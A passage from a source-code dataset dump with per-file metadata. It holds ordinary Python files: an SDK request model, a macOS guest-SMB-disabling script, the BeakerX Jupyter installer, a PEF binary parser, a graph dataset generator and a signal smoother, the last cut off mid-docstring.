待查询的Record Set的记录集类型。 取值范围:A、CNAME、MX、AAAA、TXT、SRV、NS、CAA
:param type: The type of this ListRecordSetsWithLineRequest.
:type: str
"""
self._type = type
@property
def name(self):
"""Gets the name of this ListRecordSetsWithLineRequest.
待查询的Record Set的域名中包含此name。 搜索模式默认为模糊搜索。 默认值为空。
:return: The name of this ListRecordSetsWithLineRequest.
:rtype: str
"""
return self._name
@name.setter
def name(self, name):
"""Sets the name of this ListRecordSetsWithLineRequest.
待查询的Record Set的域名中包含此name。 搜索模式默认为模糊搜索。 默认值为空。
:param name: The name of this ListRecordSetsWithLineRequest.
:type: str
"""
self._name = name
@property
def id(self):
"""Gets the id of this ListRecordSetsWithLineRequest.
待查询的Record Set的id包含此id。 搜索模式默认为模糊搜索。 默认值为空。
:return: The id of this ListRecordSetsWithLineRequest.
:rtype: str
"""
return self._id
@id.setter
def id(self, id):
"""Sets the id of this ListRecordSetsWithLineRequest.
待查询的Record Set的id包含此id。 搜索模式默认为模糊搜索。 默认值为空。
:param id: The id of this ListRecordSetsWithLineRequest.
:type: str
"""
self._id = id
@property
def records(self):
"""Gets the records of this ListRecordSetsWithLineRequest.
待查询的Record Set的值中包含此records。 搜索模式默认为模糊搜索。 默认值为空。
:return: The records of this ListRecordSetsWithLineRequest.
:rtype: str
"""
return self._records
@records.setter
def records(self, records):
"""Sets the records of this ListRecordSetsWithLineRequest.
待查询的Record Set的值中包含此records。 搜索模式默认为模糊搜索。 默认值为空。
:param records: The records of this ListRecordSetsWithLineRequest.
:type: str
"""
self._records = records
@property
def sort_key(self):
"""Gets the sort_key of this ListRecordSetsWithLineRequest.
查询结果中Record Set列表的排序字段。 取值范围: name:域名 type:记录集类型 默认值为空,表示不排序。
:return: The sort_key of this ListRecordSetsWithLineRequest.
:rtype: str
"""
return self._sort_key
@sort_key.setter
def sort_key(self, sort_key):
"""Sets the sort_key of this ListRecordSetsWithLineRequest.
查询结果中Record Set列表的排序字段。 取值范围: name:域名 type:记录集类型 默认值为空,表示不排序。
:param sort_key: The sort_key of this ListRecordSetsWithLineRequest.
:type: str
"""
self._sort_key = sort_key
@property
def sort_dir(self):
"""Gets the sort_dir of this ListRecordSetsWithLineRequest.
查询结果中Record Set列表的排序方式。 取值范围: desc:降序排序 asc:升序排序 默认值为空,表示不排序。
:return: The sort_dir of this ListRecordSetsWithLineRequest.
:rtype: str
"""
return self._sort_dir
@sort_dir.setter
def sort_dir(self, sort_dir):
"""Sets the sort_dir of this ListRecordSetsWithLineRequest.
查询结果中Record Set列表的排序方式。 取值范围: desc:降序排序 asc:升序排序 默认值为空,表示不排序。
:param sort_dir: The sort_dir of this ListRecordSetsWithLineRequest.
:type: str
"""
self._sort_dir = sort_dir
@property
def health_check_id(self):
"""Gets the health_check_id of this ListRecordSetsWithLineRequest.
健康检查ID。 搜索模式默认为模糊搜索。 默认值为空。
:return: The health_check_id of this ListRecordSetsWithLineRequest.
:rtype: str
"""
return self._health_check_id
@health_check_id.setter
def health_check_id(self, health_check_id):
"""Sets the health_check_id of this ListRecordSetsWithLineRequest.
健康检查ID。 搜索模式默认为模糊搜索。 默认值为空。
:param health_check_id: The health_check_id of this ListRecordSetsWithLineRequest.
:type: str
"""
self._health_check_id = health_check_id
@property
def search_mode(self):
"""Gets the search_mode of this ListRecordSetsWithLineRequest.
查询条件搜索模式。 取值范围: like:模糊搜索 equal:精确搜索 默认值为like。
:return: The search_mode of this ListRecordSetsWithLineRequest.
:rtype: str
"""
return self._search_mode
@search_mode.setter
def search_mode(self, search_mode):
"""Sets the search_mode of this ListRecordSetsWithLineRequest.
查询条件搜索模式。 取值范围: like:模糊搜索 equal:精确搜索 默认值为like。
:param search_mode: The search_mode of this ListRecordSetsWithLineRequest.
:type: str
"""
self._search_mode = search_mode
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.openapi_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
if attr in self.sensitive_list:
result[attr] = "****"
else:
result[attr] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, ListRecordSetsWithLineRequest):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
| 0 | 0 | 0 |
5fa9107ec28200cfbd67de77fced42b66d826210 | 1,354 | py | Python | mac_os_scripts/disable_guest_connection_to_shared_folders.py | initialed85/mac_os_scripts | aa8a2c1dc9193dbce796985f5f125c82f6f90bed | [
"MIT",
"BSD-3-Clause"
] | 32 | 2017-11-01T17:20:41.000Z | 2020-06-22T02:18:48.000Z | mac_os_scripts/disable_guest_connection_to_shared_folders.py | initialed85/mac_os_scripts | aa8a2c1dc9193dbce796985f5f125c82f6f90bed | [
"MIT",
"BSD-3-Clause"
] | null | null | null | mac_os_scripts/disable_guest_connection_to_shared_folders.py | initialed85/mac_os_scripts | aa8a2c1dc9193dbce796985f5f125c82f6f90bed | [
"MIT",
"BSD-3-Clause"
] | null | null | null | """
This script is responsible for disabling guest connection to shared folders
Commands used:
- defaults write /Library/Preferences/SystemConfiguration/com.apple.smb.server AllowGuestAccess false
"""
from common import CLITieIn
if __name__ == '__main__':
from utils import get_argparser, get_args
parser = get_argparser()
args = get_args(parser)
actor = GuestConnectionToSharedFoldersDisabler(
sudo_password=args.sudo_password,
)
result = actor.run()
if not result:
exit(1)
exit(0)
| 24.618182 | 128 | 0.672083 | """
This script is responsible for disabling guest connection to shared folders
Commands used:
- defaults write /Library/Preferences/SystemConfiguration/com.apple.smb.server AllowGuestAccess false
"""
from common import CLITieIn
class GuestConnectionToSharedFoldersDisabler(CLITieIn):
def disable_guest_connection_to_shared_folders(self):
command = '/usr/bin/defaults write /Library/Preferences/SystemConfiguration/com.apple.smb.server AllowGuestAccess false'
command_output = self.command(command)
if command_output.error_level != 0:
self._logger.error(
'{0} failed stating {1}'.format(
command, command_output
)
)
return False
return True
def run(self):
if not self.disable_guest_connection_to_shared_folders():
self._logger.error('failed disable_guest_connection_to_shared_folders; cannot continue')
return False
self._logger.debug('passed')
return True
if __name__ == '__main__':
from utils import get_argparser, get_args
parser = get_argparser()
args = get_args(parser)
actor = GuestConnectionToSharedFoldersDisabler(
sudo_password=args.sudo_password,
)
result = actor.run()
if not result:
exit(1)
exit(0)
| 699 | 34 | 76 |
baf91958f918e6464ab1f5387bba07762e5700a4 | 166 | py | Python | python_scripts/Developement/byteTest.py | ncku-uav/vis-frame-ncku | 10c5dd69f387a8022f4278bd3f21ac25f031bcf6 | [
"Apache-2.0"
] | null | null | null | python_scripts/Developement/byteTest.py | ncku-uav/vis-frame-ncku | 10c5dd69f387a8022f4278bd3f21ac25f031bcf6 | [
"Apache-2.0"
] | null | null | null | python_scripts/Developement/byteTest.py | ncku-uav/vis-frame-ncku | 10c5dd69f387a8022f4278bd3f21ac25f031bcf6 | [
"Apache-2.0"
] | null | null | null | import numpy as np
a = np.array(([109,15]), dtype=np.uint8)
b = np.ndarray((1,), dtype=np.uint16, buffer=a)
print(b*0.0062)
c = b.byteswap()
print(c)
print(c*0.0062) | 20.75 | 47 | 0.656627 | import numpy as np
a = np.array(([109,15]), dtype=np.uint8)
b = np.ndarray((1,), dtype=np.uint16, buffer=a)
print(b*0.0062)
c = b.byteswap()
print(c)
print(c*0.0062) | 0 | 0 | 0 |
43132477770b69de7164dba0f5bd31ee4551b24a | 8,359 | py | Python | beakerx/beakerx/install.py | altavir/beakerx | 06fb4200d8042fc2a52e3a1ce8be8aa4b72d3743 | [
"Apache-2.0"
] | null | null | null | beakerx/beakerx/install.py | altavir/beakerx | 06fb4200d8042fc2a52e3a1ce8be8aa4b72d3743 | [
"Apache-2.0"
] | null | null | null | beakerx/beakerx/install.py | altavir/beakerx | 06fb4200d8042fc2a52e3a1ce8be8aa4b72d3743 | [
"Apache-2.0"
] | null | null | null | # Copyright 2017 TWO SIGMA OPEN SOURCE, LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
'''Installs BeakerX into a Jupyter and Python environment.'''
import argparse
import json
import os
import pkg_resources
import shutil
import subprocess
import sys
import pathlib
import tempfile
from string import Template
from jupyter_client.kernelspecapp import KernelSpecManager
from jupyter_core import paths
from traitlets.config.manager import BaseJSONConfigManager
from distutils import log
if __name__ == "__main__":
install()
| 35.570213 | 116 | 0.656299 | # Copyright 2017 TWO SIGMA OPEN SOURCE, LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
'''Installs BeakerX into a Jupyter and Python environment.'''
import argparse
import json
import os
import pkg_resources
import shutil
import subprocess
import sys
import pathlib
import tempfile
from string import Template
from jupyter_client.kernelspecapp import KernelSpecManager
from jupyter_core import paths
from traitlets.config.manager import BaseJSONConfigManager
from distutils import log
def _all_kernels():
kernels = pkg_resources.resource_listdir(
'beakerx', 'kernel')
return [kernel for kernel in kernels if (kernel != 'base' and kernel !='sparkex' and kernel !='runtimetools')]
def _base_classpath_for(kernel):
return pkg_resources.resource_filename(
'beakerx', os.path.join('kernel', kernel))
def _classpath_for(kernel):
return pkg_resources.resource_filename(
'beakerx', os.path.join('kernel', kernel, 'lib', '*'))
def _uninstall_nbextension():
subprocess.check_call(["jupyter", "nbextension", "disable", "beakerx", "--py", "--sys-prefix"])
subprocess.check_call(["jupyter", "nbextension", "uninstall", "beakerx", "--py", "--sys-prefix"])
subprocess.check_call(["jupyter", "serverextension", "disable", "beakerx", "--py", "--sys-prefix"])
def _install_nbextension():
if sys.platform == 'win32':
subprocess.check_call(["jupyter", "nbextension", "install", "beakerx", "--py", "--sys-prefix"])
else:
subprocess.check_call(["jupyter", "nbextension", "install", "beakerx", "--py", "--symlink", "--sys-prefix"])
subprocess.check_call(["jupyter", "nbextension", "enable", "beakerx", "--py", "--sys-prefix"])
subprocess.check_call(["jupyter", "serverextension", "enable", "beakerx", "--py", "--sys-prefix"])
def _install_labextensions(lab):
if lab:
subprocess.check_call(["jupyter", "labextension", "install", "@jupyter-widgets/jupyterlab-manager"])
subprocess.check_call(["jupyter", "labextension", "install", "beakerx-jupyterlab"])
def _uninstall_labextensions(lab):
if lab:
subprocess.check_call(["jupyter", "labextension", "uninstall", "beakerx-jupyterlab"])
subprocess.check_call(["jupyter", "labextension", "uninstall", "@jupyter-widgets/jupyterlab-manager"])
def _copy_tree(src, dst):
if os.path.exists(dst):
shutil.rmtree(dst)
shutil.copytree(src, dst)
def _copy_icons():
log.info("installing icons...")
kernels = KernelSpecManager().find_kernel_specs()
for kernel in _all_kernels():
dst_base = kernels.get(kernel)
src_base = _base_classpath_for(kernel)
shutil.copyfile(os.path.join(src_base, 'logo-32x32.png'), os.path.join(dst_base, 'logo-32x32.png'))
shutil.copyfile(os.path.join(src_base, 'logo-64x64.png'), os.path.join(dst_base, 'logo-64x64.png'))
def _install_css():
log.info("installing custom CSS...")
resource = os.path.join('static', 'custom')
src_base = pkg_resources.resource_filename('beakerx', resource)
dst_base = pkg_resources.resource_filename('notebook', resource)
_copy_tree(os.path.join(src_base, 'fonts'), os.path.join(dst_base, 'fonts'))
shutil.copyfile(os.path.join(src_base, 'custom.css'), os.path.join(dst_base, 'custom.css'))
def _install_kernels():
base_classpath = _classpath_for('base')
for kernel in _all_kernels():
kernel_classpath = _classpath_for(kernel)
classpath = json.dumps(os.pathsep.join([base_classpath, kernel_classpath]))
template = pkg_resources.resource_string(
'beakerx', os.path.join('kernel', kernel, 'kernel.json'))
contents = Template(template.decode()).substitute(PATH=classpath)
with tempfile.TemporaryDirectory() as tmpdir:
kernel_dir = os.path.join(tmpdir, kernel)
os.mkdir(kernel_dir)
with open(os.path.join(kernel_dir, 'kernel.json'), 'w') as f:
f.write(contents)
install_cmd = [
'jupyter', 'kernelspec', 'install',
'--sys-prefix', '--replace',
'--name', kernel, kernel_dir
]
subprocess.check_call(install_cmd)
def _uninstall_kernels():
for kernel in _all_kernels():
uninstall_cmd = [
'jupyter', 'kernelspec', 'remove', kernel, '-y', '-f'
]
try:
subprocess.check_call(uninstall_cmd)
except subprocess.CalledProcessError:
pass #uninstal_cmd prints the appropriate message
def _install_magics():
log.info("installing groovy magic for python...")
dir_path = os.path.join(sys.prefix, 'etc', 'ipython')
os.makedirs(dir_path, exist_ok=True)
with open(os.path.join(dir_path, 'ipython_config.py'), 'w+') as ipython_config:
ipython_config.write("c = get_config()\n")
ipython_config.write("c.InteractiveShellApp.extensions = ["
"'beakerx.autotranslation',\n"
"'beakerx_magics.kernel_magic',\n"
"'beakerx_magics.groovy_magic',\n"
"'beakerx_magics.clojure_magic',\n"
"'beakerx_magics.kotlin_magic',\n"
"'beakerx_magics.scala_magic',\n"
"'beakerx_magics.sql_magic',\n"
"'beakerx_magics.java_magic'\n"
"]\n")
def _set_conf_privileges():
config_path = os.path.join(paths.jupyter_config_dir(), 'beakerx.json')
if pathlib.Path(config_path).exists():
os.chmod(config_path, 0o600)
def _pretty(it):
return json.dumps(it, indent=2)
def _install_kernelspec_manager(prefix, disable=False):
CKSM = "beakerx.kernel_spec.BeakerXKernelSpec"
KSMC = "kernel_spec_class"
action_prefix = "Dis" if disable else "En"
log.info("{}abling BeakerX server config...".format(action_prefix))
path = os.path.join(prefix, "etc", "jupyter")
if not os.path.exists(path):
log.debug("Making directory {}...".format(path))
os.makedirs(path)
cm = BaseJSONConfigManager(config_dir=path)
cfg = cm.get("jupyter_notebook_config")
log.debug("Existing config in {}...\n{}".format(path, _pretty(cfg)))
nb_app = cfg.setdefault("KernelSpecManager", {})
if disable and nb_app.get(KSMC, None) == CKSM:
nb_app.pop(KSMC)
elif not disable:
nb_app.update({KSMC: CKSM})
log.debug("Writing config in {}...".format(path))
cm.set("jupyter_notebook_config", cfg)
cfg = cm.get("jupyter_notebook_config")
log.debug("Verifying config in {}...\n{}".format(path, _pretty(cfg)))
if disable:
assert KSMC not in cfg["KernelSpecManager"]
else:
assert cfg["KernelSpecManager"][KSMC] == CKSM
log.info("{}abled BeakerX server config".format(action_prefix))
def make_parser():
parser = argparse.ArgumentParser(description=__doc__)
parser.add_argument("--prefix",
help="location of the environment to install into",
default=sys.prefix)
parser.add_argument("--disable",
help="Remove Beakerx extension",
action='store_true')
return parser
def _disable_beakerx(args):
_uninstall_nbextension()
_uninstall_labextensions(args.lab)
_uninstall_kernels()
_install_kernelspec_manager(args.prefix, disable=True)
def _install_beakerx(args):
_install_nbextension()
_install_labextensions(args.lab)
_install_kernels()
_install_css()
_copy_icons()
_install_kernelspec_manager(args.prefix)
_install_magics()
_set_conf_privileges()
def install(args):
_install_beakerx(args)
def uninstall(args):
_disable_beakerx(args)
if __name__ == "__main__":
install()
| 6,820 | 0 | 483 |
79117b489af4b29c9aed67fa82714cb3df577c31 | 2,613 | py | Python | pefbinary.py | elliotnunn/ToolboxToolbox | 2db6c57556cd12cf4bbb648df4a5d895e306babb | [
"MIT"
] | 14 | 2018-06-07T07:54:47.000Z | 2021-11-03T02:35:21.000Z | pefbinary.py | elliotnunn/ToolboxToolbox | 2db6c57556cd12cf4bbb648df4a5d895e306babb | [
"MIT"
] | 1 | 2017-01-05T15:07:34.000Z | 2017-01-06T13:53:00.000Z | pefbinary.py | elliotnunn/toolboxtoolbox | f67194a8893ec4277fa189412bcda5a62160ff99 | [
"MIT"
] | 4 | 2018-12-09T21:10:40.000Z | 2019-05-07T20:50:23.000Z | import struct
| 29.359551 | 122 | 0.574436 | import struct
class PEF:
MAGIC = b'Joy!'
CONT_HEAD_FMT = '>4s4s4s5I2HI'
CONT_HEAD_LEN = struct.calcsize(CONT_HEAD_FMT)
SEC_HEAD_FMT = '>i5I4B'
SEC_HED_LEN = struct.calcsize(SEC_HEAD_FMT)
@classmethod
def read_from(cls, path):
with open(path, 'rb') as f:
return cls(f.read())
def __init__(self, data):
(magic, fourcc, arch, ver,
timestamp, old_def_ver, old_imp_ver, cur_ver,
sec_count, inst_sec_count, reserv) = struct.unpack_from(self.CONT_HEAD_FMT, data)
sec_earliest = len(data)
sec_latest = 0
self.sections = []
self.sectypes = []
self.headeroffsets = []
self.code = None
for i in range(sec_count):
sh_offset = self.CONT_HEAD_LEN + self.SEC_HED_LEN*i
(sectionName, sectionAddress, execSize,
initSize, rawSize, containerOffset,
regionKind, shareKind, alignment, reserved) = struct.unpack_from(self.SEC_HEAD_FMT, data, sh_offset)
the_sec = data[containerOffset : containerOffset + rawSize]
if regionKind == 0 and execSize == initSize == rawSize:
the_sec = bytearray(the_sec)
self.code = the_sec
self.sections.append(the_sec)
self.sectypes.append(regionKind)
self.headeroffsets.append(sh_offset)
sec_earliest = min(sec_earliest, containerOffset)
sec_latest = max(sec_latest, containerOffset + rawSize)
if any(data[sec_latest:]):
print('nonzero trailing data from', hex(sec_latest), 'to', hex(len(data)), ' ... will cause incorrect output')
self.padmult = 1
while len(data) % (self.padmult * 2) == 0:
self.padmult *= 2
self.header = data[:sec_earliest]
def __bytes__(self):
accum = bytearray(self.header)
for i in range(len(self.sections)):
the_sec = self.sections[i]
hoff = self.headeroffsets[i]
while len(accum) % 16:
accum.append(0)
new_off = len(accum)
new_len = len(the_sec)
accum.extend(the_sec)
struct.pack_into('>I', accum, hoff + 20, new_off)
if the_sec is self.code:
for i in range(8, 20, 4):
struct.pack_into('>I', accum, hoff + i, new_len)
while len(accum) % self.padmult != 0:
accum.extend(b'\x00')
return bytes(accum)
def write_to(self, path):
with open(path, 'wb') as f:
f.write(bytes(self))
| 2,270 | 306 | 23 |
994da16e08cf7637ccc9aad09dc7d6c11b0ad8b3 | 1,363 | py | Python | G2G/preprocess/generate.py | mattiaforc/GDL | 2da0b8de66074bb188302bb670cca7e8bf64ff9e | [
"MIT"
] | 2 | 2020-08-05T09:10:24.000Z | 2020-08-05T14:21:23.000Z | G2G/preprocess/generate.py | mattiaforc/GDL | 2da0b8de66074bb188302bb670cca7e8bf64ff9e | [
"MIT"
] | null | null | null | G2G/preprocess/generate.py | mattiaforc/GDL | 2da0b8de66074bb188302bb670cca7e8bf64ff9e | [
"MIT"
] | null | null | null | import torch
import itertools
from typing import List, Tuple, Dict, Generator, Iterable
from tqdm import tqdm
from G2G.model.graph_wrapper import GraphWrapper
from G2G.utils import shortest_as_adj_from_graph_wrapper
| 40.088235 | 118 | 0.611886 | import torch
import itertools
from typing import List, Tuple, Dict, Generator, Iterable
from tqdm import tqdm
from G2G.model.graph_wrapper import GraphWrapper
from G2G.utils import shortest_as_adj_from_graph_wrapper
def generate_graphs(iterations: int, N: int, random: str = 'randn') -> Generator[GraphWrapper, None, None]:
for _ in range(iterations):
A = torch.zeros((N, N))
for i in range(N):
for j in range(i + 1):
A[i][j] = A[j][i]
else:
A[i][j + 1::] = torch.nn.functional.relu(
torch.randn((1, N - i - 1)) if random == 'randn' else torch.randint(0, 10, (1, N - i - 1)))
yield GraphWrapper(A)
def generate_dataset(iterations: int, N: int, random: str = 'randn', tqdm_enabled: bool = True) \
        -> Tuple[List[GraphWrapper], Dict[str, Dict[Tuple[int, int], torch.Tensor]]]:
    """Generate random graphs plus, per graph, the shortest-path adjacency
    matrix for every unordered pair of nodes (1..N).

    Returns (graphs, targets) where targets maps str(graph) -> {(u, v): tensor}.
    Wraps generation in a tqdm progress bar when ``tqdm_enabled``.
    """
    graphs: List[GraphWrapper] = []
    targets: Dict[str, Dict[Tuple[int, int], torch.Tensor]] = {}
    source: Iterable = generate_graphs(iterations, N, random=random)
    if tqdm_enabled:
        source = tqdm(source, total=iterations)
    for graph in source:
        graphs.append(graph)
        per_graph: Dict[Tuple[int, int], torch.Tensor] = {}
        for pair in itertools.combinations(range(1, N + 1), r=2):
            per_graph[pair] = shortest_as_adj_from_graph_wrapper(graph, *pair)
        targets[str(graph)] = per_graph
    return graphs, targets
| 1,099 | 0 | 46 |
503fcf1b261f7924290509d952410445f9afbf70 | 21,163 | py | Python | _delphi_utils_python/delphi_utils/smooth.py | qx-teo/covidcast-indicators | 6eabe62748a206b5e6d65f9e11c65ef1c76cdb0a | [
"MIT"
] | 8 | 2020-10-12T04:27:04.000Z | 2022-03-08T16:56:57.000Z | _delphi_utils_python/delphi_utils/smooth.py | qx-teo/covidcast-indicators | 6eabe62748a206b5e6d65f9e11c65ef1c76cdb0a | [
"MIT"
] | 666 | 2020-09-30T21:18:41.000Z | 2022-03-31T22:37:12.000Z | _delphi_utils_python/delphi_utils/smooth.py | qx-teo/covidcast-indicators | 6eabe62748a206b5e6d65f9e11c65ef1c76cdb0a | [
"MIT"
] | 13 | 2020-10-01T14:25:06.000Z | 2022-02-12T08:31:19.000Z | """Smoother utility.
This file contains the smoothing utility functions. We have a number of
possible smoothers to choose from: windowed average, local weighted regression,
and a causal Savitzky-Golay filter.
Code is courtesy of Dmitry Shemetov, Maria Jahja, and Addison Hu.
These smoothers are all functions that take a 1D numpy array and return a smoothed
1D numpy array of the same length (with a few np.nans in the beginning). See the
docstrings for details.
"""
from typing import Union
import warnings
import numpy as np
import pandas as pd
class Smoother:  # pylint: disable=too-many-instance-attributes
    """Smoother class.

    This is the smoothing utility class. This class holds the parameter settings for its smoother
    methods and provides reasonable defaults. Basic usage can be found in the examples below.

    The smoother function takes numpy arrays or pandas Series as input, expecting the values to be
    on a regularly-spaced time grid. NANs are ok, as long as the array does not begin with a NAN.
    The rest of the NANs will be handled via imputation by default, though this can be turned off.

    Parameters
    ----------
    smoother_name: {'savgol', 'moving_average', 'identity', 'left_gauss_linear'}
        This variable specifies the smoother. We have four smoothers, currently:
        * 'savgol' or a Savtizky-Golay smoother (default)
        * 'moving_average' or a moving window average smoother
        * 'identity' or the trivial smoother (no smoothing)
        * 'left_gauss_linear' or a Gaussian-weight linear regression smoother
        Descriptions of the smoothers are available in the doc strings. Full mathematical
        details are in: https://github.com/cmu-delphi/covidcast-modeling/ in the folder
        'indicator_smoother'.
    poly_fit_degree: int
        A parameter for the 'savgol' smoother which sets the degree of the polynomial fit.
    window_length: int
        The length of the fitting window for 'savgol' and the averaging window 'moving_average'.
        This value is in the units provided by the data, which are likely to be days for Delphi.
        Note that if window_length is smaller than the length of the signal, then only the
        imputation method is run on the signal.
    gaussian_bandwidth: float or None
        If float, all regression is done with Gaussian weights whose variance is
        half the gaussian_bandwidth. If None, performs unweighted regression. (Applies
        to 'left_gauss_linear' and 'savgol'.)
        Here are some reference values (the given bandwidth produces a 95% weighting on
        the data of length time window into the past):
            time window | bandwidth
            7           | 36
            14          | 144
            21          | 325
            28          | 579
            35          | 905
            42          | 1303
    impute_method: {'savgol', 'zeros', None}
        If 'savgol' (default), will fill nan values with a savgol fit on the largest available time
        window prior (up to window_length). If 'zeros', will fill nan values with zeros.
        If None, leaves the nans in place.
    minval: float or None
        The smallest value to allow in a signal. If None, there is no smallest value.
        Currently only implemented for 'left_gauss_linear'. This should probably not be in the scope
        of the smoothing utility.
    boundary_method: {'shortened_window', 'identity', 'nan'}
        Determines how the 'savgol' method handles smoothing at the (left) boundary, where the past
        data length is shorter than the window_length parameter. If 'shortened_window', it uses the
        maximum window available; at the very edge (generally up to poly_fit_degree) it keeps the
        same value as the raw signal. If 'identity', it just keeps the raw signal. If 'nan', it
        writes nans. For the other smoothing methods, 'moving_average' writes nans and
        'left_gauss_linear' uses a shortened window.

    Methods
    ----------
    smooth: np.ndarray or pd.Series
        Takes a 1D signal and returns a smoothed version.
        The input and the output have the same length and type.

    Example Usage
    -------------
    Example 1. Apply a rolling average smoother with a window of length 10.
    >>> smoother = Smoother(smoother_name='moving_average', window_length=10)
    >>> smoothed_signal = smoother.smooth(signal)

    Example 2. Smooth a dataframe column.
    >>> smoother = Smoother(smoother_name='savgol')
    >>> df[col] = df[col].transform(smoother.smooth)

    Example 3. Apply a rolling weighted average smoother, with 95% weight on the recent 2 weeks and
    a sharp cutoff after 4 weeks.
    >>> smoother = Smoother(smoother_name='savgol', poly_fit_degree=0, window_length=28,
                            gaussian_bandwidth=144)
    >>> smoothed_signal = smoother.smooth(signal)

    Example 4. Apply a local linear regression smoother (essentially equivalent to
    `left_gauss_linear`), with 95% weight on the recent week and a sharp
    cutoff after 3 weeks.
    >>> smoother = Smoother(smoother_name='savgol', poly_fit_degree=1, window_length=21,
                            gaussian_bandwidth=36)
    >>> smoothed_signal = smoother.smooth(signal)

    Example 5. Apply the identity function (simplifies code that iterates through smoothers _and_
    expects a copy of the raw data).
    >>> smoother = Smoother(smoother_name='identity')
    >>> smoothed_signal = smoother.smooth(signal)
    """

    def __init__(
        self,
        smoother_name="savgol",
        poly_fit_degree=2,
        window_length=28,
        gaussian_bandwidth=144,  # a ~2 week window
        impute_method=None,
        minval=None,
        boundary_method="shortened_window",
    ):
        """See class docstring."""
        self.smoother_name = smoother_name
        self.poly_fit_degree = poly_fit_degree
        self.window_length = window_length
        self.gaussian_bandwidth = gaussian_bandwidth
        self.impute_method = self._select_imputer(impute_method, self.smoother_name)
        self.minval = minval
        self.boundary_method = boundary_method

        valid_smoothers = {"savgol", "left_gauss_linear", "moving_average", "identity"}
        valid_impute_methods = {"savgol", "zeros", "identity"}
        valid_boundary_methods = {"shortened_window", "identity", "nan"}
        if self.smoother_name not in valid_smoothers:
            raise ValueError("Invalid smoother_name given.")
        if self.impute_method not in valid_impute_methods:
            raise ValueError("Invalid impute_method given.")
        if self.boundary_method not in valid_boundary_methods:
            raise ValueError("Invalid boundary_method given.")
        if self.window_length <= 1:
            raise ValueError("Window length is too short.")

        if smoother_name == "savgol":
            # The polynomial fitting is done on a past window of size window_length
            # including the current day value.
            self.coeffs = self.savgol_coeffs(
                -self.window_length + 1, 0, self.poly_fit_degree
            )
        else:
            self.coeffs = None

    def _select_imputer(self, impute_method, smoother_name):
        """Resolve the default imputation method for a given smoother.

        A caller-supplied impute_method passes through unchanged; when the
        caller gave None, the 'identity' smoother keeps nans as-is
        ('identity' imputation) and every other smoother defaults to
        'savgol' imputation.
        """
        # BUGFIX: this method was missing entirely, so __init__'s call to
        # self._select_imputer raised AttributeError on every construction.
        if impute_method is None and smoother_name != "identity":
            return "savgol"
        if impute_method is None and smoother_name == "identity":
            return "identity"
        return impute_method

    def smooth(
        self, signal: Union[np.ndarray, pd.Series], impute_order=2
    ) -> Union[np.ndarray, pd.Series]:
        """Apply a smoother to a signal.

        The major workhorse smoothing function. Imputes the nans and then applies
        a smoother to the signal.

        Parameters
        ----------
        signal: np.ndarray or pd.Series
            A 1D signal to be smoothed.
        impute_order: int
            The polynomial order of the fit used for imputation. By default, this is set to
            2.

        Returns
        ----------
        signal_smoothed: np.ndarray or pd.Series
            A smoothed 1D signal. Returns an array of the same type and length as
            the input.
        """
        # If all nans, pass through
        if np.all(np.isnan(signal)):
            return signal

        is_pandas_series = isinstance(signal, pd.Series)
        pandas_index = signal.index if is_pandas_series else None
        signal = signal.to_numpy() if is_pandas_series else signal

        # Find where the first non-nan value is located and truncate the initial nans
        ix = np.where(~np.isnan(signal))[0][0]
        signal = signal[ix:]

        # Don't smooth in certain edge cases
        if len(signal) < self.poly_fit_degree or len(signal) == 1:
            signal_smoothed = signal.copy()
        else:
            # Impute
            signal = self.impute(signal, impute_order=impute_order)
            # Smooth
            signal_smoothed = self._select_smoother()(signal)

        # Append the nans back, since we want to preserve length
        signal_smoothed = np.hstack([np.nan * np.ones(ix), signal_smoothed])
        # Convert back to pandas if necessary
        if is_pandas_series:
            signal_smoothed = pd.Series(signal_smoothed)
            signal_smoothed.index = pandas_index
        return signal_smoothed

    def _select_smoother(self):
        """Select a smoothing method based on the smoother type."""
        if self.smoother_name == "savgol":
            return self.savgol_smoother
        if self.smoother_name == "left_gauss_linear":
            return self.left_gauss_linear_smoother
        if self.smoother_name == "moving_average":
            return self.moving_average_smoother
        if self.smoother_name == "identity":
            return lambda x: x
        raise ValueError(f"invalid smoother {self.smoother_name}")

    def impute(self, signal, impute_order=2):
        """Impute the nan values in the signal.

        See the class docstring for an explanation of the impute methods.

        Parameters
        ----------
        signal: np.ndarray
            1D signal to be imputed.
        impute_order: int
            The polynomial order of the fit used for imputation.

        Returns
        -------
        imputed_signal: np.ndarray
            Imputed signal.
        """
        if self.impute_method == "savgol":
            # We cannot impute if the signal begins with a NaN (there is no information to go by).
            # To preserve input-output array lengths, this util will not drop NaNs for you.
            if np.isnan(signal[0]):
                raise ValueError("The signal should not begin with a nan value.")
            imputed_signal = self.savgol_impute(signal, impute_order)
        elif self.impute_method == "zeros":
            imputed_signal = np.nan_to_num(signal)
        elif self.impute_method == "identity":
            imputed_signal = np.copy(signal)
        return imputed_signal

    def moving_average_smoother(self, signal):
        """Compute a moving average on the signal.

        Parameters
        ----------
        signal: np.ndarray
            Input array.

        Returns
        -------
        signal_smoothed: np.ndarray
            An array with the same length as arr, but the first window_length-1
